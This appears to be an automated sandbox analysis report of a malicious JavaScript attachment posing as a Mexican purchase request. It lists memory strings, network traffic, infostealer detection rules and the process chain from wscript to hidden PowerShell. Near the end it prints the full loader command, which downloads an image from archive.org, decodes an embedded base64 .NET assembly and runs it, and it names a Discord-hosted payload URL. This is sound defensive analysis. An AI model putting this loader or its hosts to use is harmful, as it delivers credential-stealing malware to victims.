                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 00000002.00000002.2153683025.000001DCD521A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                      Source: powershell.exe, 00000002.00000002.2153683025.000001DCD525F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.arXR(
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org
                      Source: powershell.exe, 00000002.00000002.2153683025.000001DCD5A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote
                      Source: powershell.exe, 00000004.00000002.2142357124.000001CEE90E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE819FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49705 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, gmBpn1ecBmQ.cs.Net Code: cTytqmH

                      System Summary

                      barindex
                      Source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 768, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 10876
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 10876Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB?
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D35FD84_2_00007FF848D35FD8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E0091E4_2_00007FF848E0091E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00BC41F08_2_00BC41F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00BCA5688_2_00BCA568
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00BC4AC08_2_00BC4AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00BCEDBA8_2_00BCEDBA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00BCAD288_2_00BCAD28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00BC3EA88_2_00BC3EA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_060F24288_2_060F2428
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_060FE0488_2_060FE048
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_061066C08_2_061066C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_061024308_2_06102430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0610C2508_2_0610C250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_061052588_2_06105258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0610B3008_2_0610B300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_06107E508_2_06107E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_061077708_2_06107770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0610E4708_2_0610E470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_061000408_2_06100040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_061059C08_2_061059C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_061000078_2_06100007
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_061000388_2_06100038
                      Source: RFQ448903423_MAT_HASUE_de_Mexico.jsInitial sample: Strings found which are bigger than 50
                      Source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Process Memory Space: powershell.exe PID: 768, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                      Source: powershell.exe, 00000004.00000002.2140899724.000001CEE7709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .CMD;.VBp
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@13/5@4/4
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufxbwwa2.wao.ps1Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RFQ448903423_MAT_HASUE_de_Mexico.jsVirustotal: Detection: 13%
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB?
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] 